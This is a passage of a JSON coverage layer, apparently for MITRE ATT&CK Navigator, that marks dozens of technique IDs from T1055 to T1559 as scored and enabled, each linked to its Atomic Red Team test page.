:100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.0